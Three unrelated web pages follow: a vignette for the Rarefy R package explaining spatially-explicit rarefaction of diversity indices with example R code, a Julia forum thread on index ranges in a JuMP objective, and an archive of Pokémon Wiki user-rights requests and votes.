# A quick introduction to rarefaction analisys using Rarefy #### 2021-03-11 #Required packages require(Rarefy) require(ape) require(vegan) require(phyloregion) require(raster) ## Introduction Rarefy is an R package including a set of new functions able to cope with any diversity metric and to calculate expected values of a given taxonomic, functional or phylogenetic index for a reduced sampling size under a spatially-constrained and distance-based ordering of the sampling units. Rarefy and the functions therein represent an ultimate solution for ecologists to rarefy any diversity metric by taking into account the contribution of any distance-based ordination of sampling units, providing more ecological meaningful (unbiased) estimates of the expected diversities. This vignette aims at describing some applications of the Rarefy package helping the user to calculate different types of spatially and non-spatially explicit rarefaction curves. The vignette is organized in the following sections, exploring different package features and applications: 1. Diversity indices and dataset available in Rarefy; 2. Spatially-explicit rarefaction; 3. Rarefaction of alpha diversity indices; 4. Rarefaction of beta diversity; 5. Phylogenetic spatially-explicit rarefaction; 6. Null models in rarefaction practice. ## 1. Diversity indices and dataset available in Rarefy Rarefy offers the possibility to calculate a large set of diversity indices and new metrics will be implemented in future packages updates. In the table below, for functions implemented in Rarefy, the set of indices available are detailed. Functions Metrics Formula Description $$\textbf{rare_alpha}$$ HCDT entropy (HCDT) $HCDT=\frac{\left(1-\sum_{i=1}^{n}p_i^q\right)}{\left(q-1\right)}$ HCDT entropy (Harvda & Charvat 1967; Daròczy 1970; Tsallis 1988) is a generalization of the standard coefficient of entropy. $$q$$ is the parameter that regulates the sensitivity to species abundance and $$p_i$$ is the relative abundance of species $$i$$. For $$q=0$$, the index is equal to species richness minus one, for $$q$$ tending to 1, it is equivalent to Shannon entropy and for $$q=2$$ it is equivalent to the Gini-Simpson index. Hill numbers ($$^{q}D$$) $^{q}\textrm{D}=\left( \sum_{i=1}^{S}p_i^q\right )^{1/(1-q)}$ Hill numbers (Hill 1973) is a class of measures that obeys to the replication principle and integrates species richness and species abundances. The parameter $$q$$, called 'order', regulates the sensitivity of the index to the species abundance: with $$q=0$$ the value of the index corresponds to the species richness, with $$q$$ tending to 1 the measure tends to the exponential of Shannon index, and with $$q=2$$ it corresponds to the inverse of Simpson index. $$p_i$$ is the relative abundance of species $$i$$. $$\textbf{rare_beta}$$ Bray-Curtis dissimilarity ($$\beta_{bray}$$) $\beta_{bray}=\frac{\sum_{i}(x_i-x_j)}{\sum_{i}x_i+x_j}$ Bray-Curtis dissimilarity (Bray & Curtis 1957) is a pairwise measure of similarity between plots weighted by the abundances of the species. The accumulation curve is calculated with the mean of pairwise dissimilarities among $$N$$ plots. $$x_i$$ and $$x_j$$ are the abundances of the species $$x$$ in the plots $$i$$ and $$j$$. Cody index ($$\beta_{c}$$) $\beta_c=\frac{\left[g\left(H\right)+l\left(H\right)\right]}{2}$ Cody index (Cody 1975) is defined as the rate at which species are being replaced in censuses at each point on the habitat gradient and is fixed for samples arranged along gradients of environmental change. $$g(H)$$ is the number of species gained along the habitat gradient $$H$$ and $$l(H)$$ is the number of species lost. Jaccard similarity coefficient ($$\beta_{j}$$) $\beta_j=\frac{a}{\left(\alpha_1+\alpha_2-a\right)}$ Jaccard dissimilarity coefficient (Jaccard 1901, 1912) is a pairwise measure of dissimilarity between plots. The accumulation curve is calculated with the mean of pairwise dissimilarities among $$N$$ plots. $$a$$ is the number of species in common between two plots, and $$\alpha_1$$ and $$\alpha_2$$ are the values of alpha diversity (species richness) of the 2 plots compared. Whittaker's species turnover ($$\beta_{w}$$) $\beta_w=\frac{\gamma}{\alpha}-1$ Whittaker's species turnover (Whittaker 1960, 1972) calculates how many times there is a change in species composition among the plots.$$\gamma$$ is the species richness over all plots compared and $$\alpha$$ the average species richness within a single plot $$\textbf{rare_phylo/ser_phylo}$$ Barker's weighted phylogenetic diversity (PDw) $PDw=B\times\frac{\sum_{i}^{B}{L_iA_i}}{\sum_{i}^{B}A_i}$ Barker's weighted phylogenetic diversity ($$PD_w$$) (Barker 2002) is the abundance weighted Faith's $$PD$$: the number of branches is multiplied by the weighted mean branch length, with weights equal to the average abundance of species sharing that branch. $$L_i$$ is the branch length of the branch $$i$$, and $$A_i$$ is the average abundance of the species sharing the branch $$i$$. $$B$$ is the number of branches in the tree. Faith’s phylogenetic diversity (PD) $PD=\sum_{i\in B} L_i$ Faith’s phylogenetic diversity ($$PD$$) (Faith 1992), is defined as the sum of branch lengths in a phylogenetic tree for the assemblage of species. $$L_i$$ is the branch length of the branch $$i$$ and $$B$$ is the number of branches in the tree. Feature diversity indexes (ƒdiv) $^qƒdiv_{Hill}=\left [\sum_{i \in B} L_{i}(p_{i})^{q}]\right ]^{\frac{1}{1-q}}$ $^qƒdiv_{HCDT}= \frac{1-\sum_{i \in B} L_{i}(p_{i})^q}{q-1}$ $^qƒdiv_{Renyi}= \frac{1}{1-q}log\left [ \sum_{i \in B} L_{i}(p_{i})^q\right]$ Feature diversity indexes (ƒdiv) (Pavoine & Ricotta 2019) are Hill numbers and the HCDT and Rényi entropies adapted for the calculation of the phylogenetic diversity replacing the species with the units of the branch length in the phylogenetic tree. $$L_i$$ is the branch length of the branch $$i$$, $$p_i$$ is the relative abundance of the species sharing the branch $$i$$ and $$q$$ is the scaling constant that weights the importance of rarity of the species. $$B$$ is the number of branches in the tree. Pavoine’s index (Ia) $I_a=\sum_{K=1}^{N}{\left(t_K-t_{K-1}\right)H_{a,K}}$ Pavoine’s index ($$I_a$$) (Pavoine et al. 2009) calculates phylogenetic diversity partitioned between evolutionary periods and between plots defined in terms of spatial and time units. Tsallis or HCDT entropy (Harvda & Charvat 1967; Daròczy 1970; Tsallis 1988) (it measures diversity by regrouping individuals into categories) is computed for each period of the phylogenetic tree, from the number of lineages that descend from the period and from the relative abundances summed within these lineages within the focal community. With $$a=0$$, HCDT is the richness (number of species) minus one and $$I_a$$ is Faith's $$PD$$ minus the height of the phylogenetic tree; with $$a$$ tending to 1 HCDT is a generalization of the Shannon index while with $$a=2$$ HCDT is the Simpson index and $$I_a$$ is Rao's QE applied to phylogenetic distances between species. To apply $$I_a$$, the phylogeny must be ultrametric. $$H_{a,K}$$ is HCDT entropy of order $$a$$ applied to the period $$K$$ and $$t_K-t_{K-1}$$ is the length of the period $$K$$. $$\textbf{ser_functional}$$ Chao’s functional beta-diversity index (FD) $^{q}\textrm{FD}(\Delta(\tau))=\left ( \sum_{i=1}^{S} \nu_{i}(\tau)\left(\frac{a_i(\tau)}{n_{+}} \right )^{(1/1-q)} \right )$ Chao’s functional beta-diversity index ($$FD$$) (Chao et al. 2019) quantifies the effective number of equally-distinct functional groups in the considered plots at the distinctiveness $$\tau$$ threshold. Any two species with functional distance greater than or equal to $$\tau$$, are treated as functionally equally-distinct and as belonging to different functional groups with distance $$\tau$$. For each pair of species with functional distance lower than $$\tau$$ but different from zero, only a proportion of individuals is considered functionally equally-distinct, the other proportion of individuals is considered functionally indistinct. If the pairwise distance is equal to zero, the two species are treated as belonging to the same functional group. After dividing the set of species to form functionally indistinct groups, the contribution of every species is quantified and then the $$FD$$ of order $$q$$ is calculated using the Hill number of order $$q$$. $$a_{i}(\tau)$$ is the combined abundance of all functionally-indistinct individuals from species $$i$$, $$v_{i}(\tau)=n_{i}/a_{i}(\tau)$$ represents the attribute contribution of species $$i$$ for a threshold level $$\tau$$ ($$n_{i}$$ is the abundance of species $$i$$), $$n_+$$ is the total number of individuals in the community and $$q$$ is the parameter that determines the sensitivity of the measure to the relative abundance of the species. Rao’s quadratic entropy (Q) $Q\left(p_i,D\right)=\sum_{k=1}^{S}\sum_{l=1}^{S}p_{k}p_{l}d_{kl}$ Rao's quadratic entropy (Rao 1982) incorporates both the relative abundances of species and a measure of the pairwise functional distances between species. It expresses the average difference between two randomly selected individuals with replacements. $$p=(p1,...,p_k,...,S)$$ is the vector of relative abundances of species, $$S$$ is the number of species, $$\mathbf{D}=(d_{kl})$$ is the matrix of functional dissimilarities among species, and $$d_{kl}$$ is the functional dissimilarity between species $$k$$ and $$l$$. ## 2. Spatially-explicit rarefaction Here we provided a classic example for the calculation of the taxonomic spatially-explicit rarefaction curve using the duneFVG data included in Rarefy, as described for the first time by Chiarucci et al. (2009). The datasets are loaded as follows: data("duneFVG") #plot/species matrix data("duneFVG.xy") #plots geographic coordinates Firstly, a pairwise euclidean distance matrix between sampling units is calculated using the sampling unit coordinates: dist_sp<-dist(duneFVG.xy$tot.xy) Then, using the directionalSAC function, the spatially-explicit rarefaction curve can be directly compared with the classic rarefaction: ser_rarefaction<-directionalSAC(duneFVG$total,dist_sp) plot(1:128,ser_rarefaction$N_Exact,xlab="M",ylab="Species richness",ylim=c(0,71),pch=1) points(1:128,ser_rarefaction$N_SCR,pch=2) legend("bottomright",legend=c("Classic Rarefaction","Spatially-explicit Rarefaction"),pch=1:2) ## 3. Rarefaction of alpha diversity indices In this example, the Shannon diversity index is rarefied over the M sampling units available for the duneFVG dataset. The argument fun_div allows the user to define any index of diversity of choice, and the function rare_alpha can be used to compare the spatial and non spatial-explicit rarefaction of the selected index. In the following example, two rarefaction curves (spatially and non-spatially explicit, respectively) are thus directly compared calling the function speciesdiv() of the adiv package (Pavoine 2020). Firstly, a list containing the arguments for the function speciesdiv() is created such as the function rare_alpha() can exploit the function speciesdiv() loading the arguments. a<-list(NA,'Shannon') names(a)<-c('comm','method') Then, spatially and non-spatially Shannon values are calculated as a function of the sampling effort. rare_shannon<-rare_alpha(duneFVG$total,method="fun_div",random=999,fun_div='speciesdiv',args=a,mean=TRUE) rare_shannon_sp<-rare_alpha(duneFVG$total,dist_sp,method="fun_div",random=999,fun_div='speciesdiv',args=a,mean=TRUE,spatial=TRUE) plot(rare_shannon[,1],ylab="Shannon index",xlab="Number of sampling units",type="l", ylim=range(rare_shannon,na.rm=TRUE)) lines(rare_shannon[,2],lty=2) lines(rare_shannon[,3],lty=2) lines(rare_shannon_sp[,1],col=4) lines(rare_shannon_sp[,2],lty=2,col=4) lines(rare_shannon_sp[,3],lty=2,col=4) legend("bottomright",legend=c("Non spatially-explicit Rarefaction","Spatially-explicit Rarefaction"),lty=1,col=c(1,4)) The above figure shows the comparison of spatially and non-spatially explicit Shannon values for a given sampling effort along with 95% confidence intervals (dashed lines). When accounting for spatial structure of the data, the expected diversity increased less steeply than its non spatially-explicit counterpart resulting in lower estimates of species diversity. ## 4. Rarefaction of beta diversity Spatially-explicit or gradient-oriented (directional) turnover curves as a function of sampling effort have been firstly defined by Ricotta et al. (2019). The methodology to construct the directional curve relies on the standard procedure in which adjacent plots are combined step by step using the specified distance among plots as a constraining factor. In the simplest case, given a set of N plots, for each plot, the first, second, ..., k-th nearest neighbor are determined and a directional beta diversity curve is constructed using the resulting sequence of plots. This procedure is repeated for all plots, generating N directional curves from which a mean spatially explicit beta diversity curve is calculated. The resulting curve is thus an intermediate solution between a non-directional beta diversity curve and a pure directional curve in which all plots are ordered along a single spatial or environmental gradient. directionalSAC can be used to calculate directional, normalized directional, non-directional, normalized non-directional beta diversity as a function of sampling effort. A normalized measure of autocorrelation for directional beta diversity calculated as the normalized difference between directional and non-directional beta is also available. An example of the directional rarefaction of beta diversity is here provided using the mite dataset available in the vegan package (Oksanen et al. 2020). The same example is discussed in Appendix 1 in Ricotta et al. (2019). data(mite) data(mite.env) comm_matrix<-mite To calculate and compare directional and non directional beta diversity along the environmental gradient defined according to the substrate density (g/L), the directionalSAC function can be used as follows: beta_directional<-directionalSAC(comm_matrix,mite.env$SubsDens) Finally, directional and non-directional beta curves can be visually compared. plot(1:70,beta_directional$Beta_M,xlab="M",ylab="Beta diversity",ylim=range(c(beta_directional$Beta_M_dir,beta_directional$Beta_M))) points(1:70,beta_directional$Beta_M_dir,pch=2) legend("bottomright",legend=c("Non-directional beta","Directional beta"),pch=1:2) ## 5. Spatially-explicit phylogenetic rarefaction curve Rarefy presents for the first time the possibility to calculate spatially-explicit or gradient-based functional and phylogenetic rarefaction curves. We provide hereafter an example based on data available in the package (for functional rarefaction) and data available in other packages (phylogenetic rarefaction). Here, we present an example of a spatially-explicit phylogenetic rarefaction curve. The function rare_phylo() for the calculation of phylogenetic rarefaction curves have been used to calculate the Faith index. Data from the package phyloregion (Daru et al. 2020) have been used. First, the africa data are loaded from the package phyloregion: this list contains a sparse community composition matrix of each woody plant species presences/absences within 50 × 50 km grid cells in South Africa, an object of class SpatialPolygonsDataFrame containing the grid cells covering the geographic extent of the study area, an object of class phylo describing the phylogeny of 1400 species, an object of class dist that is a distance matrix of phylogenetic beta diversity between all grid cells at the 50 × 50 km scale and a data.frame of IUCN conservation status of each woody species. data(africa) A distance matrix between plots is extracted from the object polys of class SpatialPolygonsDataFrame. #data are in wgs84, reference system was changed to a projected one (LAEA) Poli_LAEA<-spTransform(africa$polys,CRSobj='+proj=laea +lat_0=52 +lon_0=10 +x_0=4321000 +y_0=3210000 +ellps=GRS80 +units=m +no_defs') # Warning in showSRID(uprojargs, format = "PROJ", multiline = "NO", prefer_proj # = prefer_proj): Discarded datum Unknown based on GRS80 ellipsoid in Proj4 # definition # Warning in spTransform(xSP, CRSobj, ...): NULL source CRS comment, falling back # to PROJ string # Warning in wkt(obj): CRS object has no comment #we need to fix rownames in order to make them comparable to Poli_LAEA rownames(africa$comm)<-sapply(rownames(africa$comm),function(x){gsub(pattern = "v",replacement = "", x)}) dista<-dist(coordinates(Poli_LAEA[1:50,])) Then, the phylogenetic spatially and non spatially-explicit rarefaction curves using Faith index are calculated for a subset of the dataset. raref<-ser_phylo(as.matrix(africa$comm[1:50,colSums(africa$comm)>0]),africa$phylo,dista,comparison=TRUE) plot(raref[,1],ylab="Faith Index",xlab="Number of sampling units",type="l",ylim=range(raref,na.rm=TRUE)) lines(raref[,2],lty=2) lines(raref[,3],lty=2) lines(raref[,4],col=2) lines(raref[,5],lty=2,col=2) lines(raref[,6],lty=2,col=2) legend("bottomright",legend=c("spatially-explicit phylogenetic rarefaction","classic phylogenetic rarefaction"),lty=1,col=1:2) In the figure figure, the phylogenetic rarefaction curves calculated usign the Faith index are compared. ## 6. Null models in rarefaction practice When communities are characterized by large difference in terms of species richness, it may be necessary to standardize rarefaction curves by accounting for this aspect. Null model based on re-sampling of the community can help to overcome the task. In the following example, discussed in Tordoni et al. (2019), we would like to compare functional rarefaction curves between native and alien species (62 and 9, respectively) sampled in the duneFVG study. In order to exclude that the expected lower functional diversity in alien species was merely driven by the imbalance in species number between alien and natives species, we built the rao_permuted function to test the expected functional rarefaction curve by means of species re-sampling and null model simulations. In brief, the function works in three stages: 1) from the total set of S species (62 native species in the example) sampled in M sampling units (128 plots in duneFVG), a defined number of s species (with s<S, 9 species in the example, corresponding to the alien species richness) is randomly selected; the s number of species is derived from a reference community (alien species in our example) passed to the function via the comm_str argument; 2) a functional dissimilarity matrix for the set of the s randomly selected species is calculated using their associated functional traits and then the rarefied Rao Q index is calculated for the set of M sampling units considering abundance of a reference plant community (the structure of the reference community passed to the function via the comm_str argument). 3) For each permutation, step 1 and 2 are repeated and the functional rarefaction curves are then averaged over the N permutations. The functional rarefaction curve thus obtained (that we can identify, in the example, as the average functional rarefaction curve of a community of 9 native species with the same structure of the reference alien community) can be compared to the functional rarefaction curve calculated for the community of reference, and the deviation from the two curves (when positive or negative) can be evaluated as an effect of environmental filtering, niche differentiation or biotic homogeneization, alternatively. In terms of code, the example can be run as follows: first data for alien and native species should be loaded and a functional pairwise distance matrix between native species using the Gower dissimilarity proposed by Pavoine et al. (2009) data(duneFVG.tr8) #species functional traits tr8_N<-duneFVG.tr8$traits.nat[,c(1,3,4)] tr8_D<-data.frame(duneFVG.tr8$traits.nat[,2]) tr8_Q<-duneFVG.tr8$traits.nat[,5:15] tr8dist<-dist.ktab(ktab.list.df(list(tr8_N,tr8_D,tr8_Q)),type=c('N','D','Q')) The standardized functional rarefaction curve is then calculated using the pairwise functional distance of native species and the alien assemblage as reference community. rareperm<-rao_permuted(duneFVG$alien,tr8dist) The functional rarefaction curves for the native and alien species are then calculated to be compared with the standardized functional rarefaction tr8n_N<-duneFVG.tr8$traits.nat[,c(1,3,4)] tr8n_D<-data.frame(duneFVG.tr8$traits.nat[,2]) tr8n_Q<-duneFVG.tr8$traits.nat[,5:15] tr8a_N<-duneFVG.tr8$traits.ali[,c(1,3,4)] tr8a_D<-data.frame(duneFVG.tr8$traits.ali[,2]) tr8a_Q<-duneFVG.tr8$traits.ali[,5:15] tr8ndist<-dist.ktab(ktab.list.df(list(tr8n_N,tr8n_D,tr8n_Q)),type=c('N','D','Q')) tr8adist<-dist.ktab(ktab.list.df(list(tr8a_N,tr8a_D,tr8a_Q)),type=c('N','D','Q')) raren<-rare_Rao(duneFVG$native,tr8ndist) rarea<-rare_Rao(duneFVG\$alien,tr8adist) And visually assessed to determine the degree of divergence plot(raren[,1], ylab="Rao QE",xlab="Number of sampling units",type="l",ylim=range(raren)) lines(raren[,2],lty=2) lines(raren[,3],lty=2) lines(rareperm[,1],col=2) lines(rareperm[,2],lty=2,col=2) lines(rareperm[,3],lty=2,col=2) lines(rarea[,1],col=4) lines(rarea[,2],lty=2,col=4) lines(rarea[,3],lty=2,col=4) legend("bottomright", legend=c("Native species Functional Rarefaction","Standardized Functional Rarefaction","Alien species Functional Rarefaction"),lty=1,col=c(1,2,4)) ## Cited Literature Barker, G.M. (2002) Phylogenetic diversity: a quantitative framework for measurement of priority and achievement in biodiversity conservation. Biological Journal of the Linnean Society 76, 165-194. Bray, J.R. & Curtis, J.T. (1957) An Ordination of the Upland Forest Communities of Southern Wisconsin. Ecological Monographs 27, 325-349. Chao, A., Chiu, C.‐H., Villéger, S., Sun, I‐F., Thorn, S., Lin, Y.‐C., Chiang, J.‐M., Sherwin, W.B. (2019) An attribute‐diversity approach to functional diversity, functional beta diversity, and related (dis)similarity measures. Ecological Monographs 89(2), e01343. Chiarucci, A., Bacaro, G., Rocchini, D., Ricotta, C., Palmer, M., & Scheiner S. (2009) Spatially constrained rarefaction: Incorporating the autocorrelated structure of biological communities into sample-based rarefaction. Community Ecology 10(2), 209-214. Cody, M.L. (1975) Towards a theory of continental species diversities: bird distributions over Mediterranean habitat gradients. In: Cody M.L. & Diamond J.M. (eds) Ecology and Evolution of Communities (pp. 214--257). Harvard: Belknap Press. Daròczy, Z. (1970) Generalized information functions. Inform. Control 16, 36-51. Daru, B.H., Karunarathne, P. & Schliep, K. (2020) phyloregion: R package for biogeographic regionalization and macroecology. Methods Ecol Evol, 11, 1483-1491. . Faith, DP. (1992) Conservation evaluation and phylogenetic diversity. Biol. Conserv. 61, 1--10. Havrda, J., & Charvát, F. (1967) Quantification Method of Classification Processes. Concept of Structural-Entropy. Kybernetika 3, 30-35. Hill, M.O. (1973) Diversity and Evenness: A Unifying Notation and Its Consequences. Ecology 54, 427-432. Jaccard, P. (1912), The Distribution of the flora in the alpine zone. New Phytologist 11(2): 37--50. Jaccard, P. (1901), Étude comparative de la distribution florale dans une portion des Alpes et des Jura. Bulletin de la Société vaudoise des sciences naturelles 37, 547--579. Oksanen, J., Guillaume Blanchet, F., Friendly, M., Kindt, R., Legendre, P., McGlinn, D., ... Wagner H. (2020) vegan: Community Ecology Package. R package version 2.5-3. Pavoine, S., Vallet, J., Dufour, A. B., Gachet, S., & Daniel, H. (2009) On the challenge of treating various types of variables: application for improving the measurement of functional diversity. Oikos, 118(3), 391-402. Pavoine, S., & Ricotta, C. (2019) A simple translation from indices of species diversity to indices of phylogenetic diversity. Ecological Indicators 101, 552-561. Pavoine, S. (2020) adiv: an R package to analyse biodiversity in ecology. Methods Ecol Evol, 11, 1106-1112. Rao C.R. (1982) Diversity and dissimilarity coefficients: a unified approach. Theoretical Population Biology 21, 24-43. Ricotta, C., Acosta, T.R.A., Bacaro, G., Carboni, M., Chiarucci, A., Rocchini, D., Pavoine, S. (2019) Rarefaction of beta diversity. Ecolological Indicators, 107, 105606. Tordoni, E., Petruzzellis, F., Nardini, A., Savi, T., & Bacaro, G. (2019) Make it simpler: Alien species decrease functional diversity of coastal plant communities. J Veg Sci, 30, 498-- 509. Tsallis, C. (1988) Possible generalization of Boltzamnn-Gibbs Statistics. J. Stat. Phys. 52, 479-487. Whittaker, R.H. (1972) Evolution and measurement of species diversity. Taxon 21, 213-- 251. Whittaker, R.H. (1960) Vegetation of the Siskiyou mountains, Oregon and California. Ecological Monographs 30, 279--338.
2022-01-21 17:46:26
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7363718748092651, "perplexity": 3918.841016773487}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303512.46/warc/CC-MAIN-20220121162107-20220121192107-00574.warc.gz"}
https://discourse.julialang.org/t/objective-function-declaration-issue/45028
# Objective function declaration issue If I have a member of an objective function: sum((setup_cost[f,p,j]*PR[f,p,j,t]+oper_cost[p,j]*PRD[o,f,p,j,t]) for o in O,f in FAM, p in PROD[f], j in U, t in TIME) and I want to limit the counter o, f and p on 1…end-1 (in arrays), how can I do this? Thanks! marco It’s easier to help if you provide a minimal working example. Take a read of the first post in PSA: make it easier to help you. Presumably, you want something like ``````@objective( model, Min, sum( setup_cost[f, p, j] * PR[f, p, j, t] + oper_cost[p, j] * PRD[o, f, p, j, t] for o in O[1:end-1] for f in FAM[1:end-1] for p in PROD[f][1:end-1] for j in U for t in TIME ) ) `````` Thanks odow, so “end” is also valid operator, not only length(array)? so “end” is also valid operator, Yes. Here is the documentation for Julia arrays: https://docs.julialang.org/en/v1/manual/arrays/#man-array-indexing-1 1 Like Thanks odow. 1 Like
2022-05-22 23:33:54
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8995720744132996, "perplexity": 8438.331534029445}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662550298.31/warc/CC-MAIN-20220522220714-20220523010714-00013.warc.gz"}
http://pokemon.wikia.com/wiki/Pok%C3%A9mon_Wiki:Requests_for_User_Rights/Archive_6?diff=cur&oldid=402257
# Changes: Pokémon Wiki:Requests for User Rights/Archive 6 Back to page This request for user rights was declined. — After a month of using roll back tools, I have to say a lot of vandalism has been reverted. I am writing this request because it is out of my power to delete some non-sense pages. I fear that the vandals that are here plan more and more things. I am asking the community to give me those tools for dealing with vandals and to do some other things, like renaming this. Support: #### Neutral Edit Neutral: I have a few reasons as to why I'm voting neutral your request. You do a great job in tagging unneeded pages for deletion, but when you tag pages for deletion you don't normally give a reason as to why it should be deleted. Yes, the reason it normally needs to be deleted is because 9 out of 10 times it is obvious spam or vandalism. It's common practice to remove the content of the page when marking a page for deletion, it doesn't need to be done, but it's recommended since the content can be vulgar and/or explicit content that nobody really needs to read. It's in italics because it's not something that is influencing my vote, just a recommendation for the future. I don't really see much interaction between you and the community, granted, there isn't much opportunity to do so since there aren't many people consistently editing and I personally am trying to turn things around on the wiki, but I have school and am incredibly lazy. So those opportunities that I have in mind for community interactions aren't in existence yet. I really don't want to get on your case about the messages you do send because on your userpage you have the "User en-3" userbox, which, in most cases, means that English is not your native language. Your warning-like messages, as seen here aren't that descriptive and in some cases can be worded better. Edit summaries such as this one here can be viewed as "feeding the trolls", my personal view on removing spam-like edits from pages is to just not leave an edit summary. Revert and ignore is my motto. The following talk page messages: 1, 2, 3, and 4, as well as 5, 6, 7, and 8 can all be viewed as spam-like. I understand that you want to bring more users to edit here, and in the case of your request you want it to be noticed and voted upon, but messaging multiple people for those cases is viewed as spam-like and shouldn't really be done. I really do not like voting neutral on requests, since neutrals are useless and I feel you might as well not vote if voting neutral, but I do not want to oppose because I do have hope in you becoming an administrator in the future, and I'm not ready to support you just yet. DangerousDangerously 20:04, May 11, 2013 (UTC) #### Oppose Edit Oppose: Comment: I see. The messages on talk pages are just to have some encouragement and it'd be better to have the users back editing, well, at least those that are still active on Wikia. Sadly, none of them have returned. About other things, I promise I'll improve better. Maybe not today or tomorrow, but after some time. Energy X 20:34, May 11, 2013 (UTC) ### KidProdigy (rollback-demotion) Edit This request for user rights was approved. — Hello everyone, I would like to retreat as a rollback around Pokémon Wiki. I'm actually tired of helping out this wiki too much. A lot of pages are stub, informations are in-completed (some were my fault, sorry), incorrect images and some else. Sorry, but also, lately I wasn't evenly active anymore due that I was doing something. Hopefully it will be revealed some time in the future over the net. It was fine working with all of you, thank you. KidProdigy (Local UserpageLocal Talk) 15:33, June 26, 2013 (UTC) Support: Neutral: #### Oppose Edit Oppose: Comment: Sorry to hear that. If it is some work that you had to done, it should take some time, no? But the arguments you gave, the stubs/incomplete articles, that should actually encourage you to change it. Besides, there is other work that can be done, e.g. image categorization, grammar cleanup... But if the work you mentioned keeps you inactive, I understand. - - 17:21, June 26, 2013 (UTC) Comment: I'm going to tell you straight forward that requesting demotion is one thing that's risky. People will want you to stay so they'll oppose the request. Most cases it's for requesting the demotion of someone else, not of the person with the rights. If you want to go, it's your choice, I'm not going to hold you back as we all have things that take priority. If you truly want to, think it over for a week and then message me and, if you still want to retire, I'll remove your rights. – Jazzi (talk) 17:52, June 26, 2013 (UTC) Comment: Sigh, Energy X, I have no encouragement in changing the pages or to do other work as well, this wiki makes me only somber. And Jazzi, I do not need no week the time to think about it, just remove it, thanks. KidProdigy (Local UserpageLocal Talk) 22:34, June 26, 2013 (UTC) Comment: Your wish is my command. – Jazzi (talk) 15:00, June 27, 2013 (UTC) This request for user rights was declined. — I don't normally nominate people, because I feel that they should nominate themselves if they want to receive the rights they are requesting. Energy X has shown great commitment to this wiki and helps out in every way he can. He tags many pages for deletion, I can't link the pages that he's tagged, since they're in his deleted contributions, but he is very good at what he does. You can see that the majority, if not all, of his talk page messages (which I had a link for but it broke the template) are alerting the admins to vandals and pages that require deletion. I'm ending school soon, but I have a somewhat summer job, so I won't be around much, I can't speak for Slaying and Rainbow Shifter, but it's always good to have admins in different timezones. Basically, the work that Energy X does is deserving of administrator rights. Jazzi (talk) 21:36, June 11, 2013 (UTC) #### Support Edit Support: Per nomination – Jazzi (talk) 21:36, June 11, 2013 (UTC) Support: I need somebody else! I need to check every page I see in Wiki Activity as well as deleting 14+ candidates for deletion every time I log on. And I really cannot think of somebody more active than Energy to fulfil this role. 16:55, June 15, 2013 (UTC) Support: He did seems to did a good job on it, I think he can deserve an admin rights for this wiki.-- King Marth 64 (talkother wikisblogs) 19:39, June 15, 2013 (UTC) Support: I agree. We need all the help we can get. Signed, Winxfan1. I am the ultimate fan of Winx Club 23:11, June 15, 2013 (UTC) 7:11, June 15, 2013 (UTC) Neutral: #### Oppose Edit Oppose: I fear that you won't be able to determine proper block lengths. On my talk page you suggest people get "long blocks" when they don't deserve a long block as they have not many offenses. I know I nominated you, but I have to go with my gut feeling. – Jazzi (talk) 15:07, June 27, 2013 (UTC) Comment: Give me a few days and you'll get the rights. – Jazzi (talk) 17:52, June 26, 2013 (UTC) Comment: About the blocks; some of the anonymous users that vandalised pages have done it in a recognizable way that you can compare some of their older accounts. Besides, with the "Wiki lock" that will prevent the anonymous users from editing, I can ban logged users by the pattern I use from the other wikis: first is three days, then the block rises to a week, then two weeks, then a month etc., depending if the user violated the rules. - - 17:08, June 27, 2013 (UTC) ### King Marth 64 (rollback) Edit This request for user rights was declined. — I will like to become as one of the rollback users for the Pokemon Wiki, I started as a user as DigiPen92 (my previous user name) in three years ago for the Black and White section as a Minor User and then, came back as a full time editor that knows how to revert edits, knows how to place the Deletion templates in pages that are vandalism/spam/unneeded, created about 10 pages in the wiki, I kinda know and do more on the game sections than the anime since I played the main game series alot (I haven't seen much on the anime alot), and I have about 400 main space edits in this wiki right now, so I will do helping out reverting alot of vandalism and support on the wiki. -- King Marth 64 (talkother wikisblogs) 00:33, June 25, 2013 (UTC) #### Support Edit Support: Agreed. He displayed a lot of work in so little time, as most of it are reverting back what vandals messed up. - - 09:31, June 25, 2013 (UTC) Support: Fourteen obvious vandalism reverts in the past fourteen days. I think that you now have more experience at reverting than before so I am changing to support. 18:02, July 4, 2013 (UTC). #### Neutral Edit Neutral: Give me some time to think it over. – Jazzi (talk) 17:52, June 26, 2013 (UTC) Neutral: I would like to see more edits before this is put into place. 18:32, June 26, 2013 (UTC) Neutral:Iwanna see your regularity,efficent edits and behaviur a little more. 13:27, July 9, 2013 (UTC) #### Oppose Edit Oppose: Comment: He is a regular editor as of late... Which contributions are you looking at? 13:39, July 9, 2013 (UTC) Comment: You cannot vote due to having only 68 mainspace contributions. – 